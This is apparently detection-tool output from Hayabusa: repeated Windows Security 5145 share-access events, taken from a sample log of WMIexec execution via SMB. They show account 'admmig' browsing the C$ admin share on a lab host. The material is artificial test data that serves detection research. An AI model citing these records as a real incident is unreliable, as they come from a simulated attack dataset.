2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
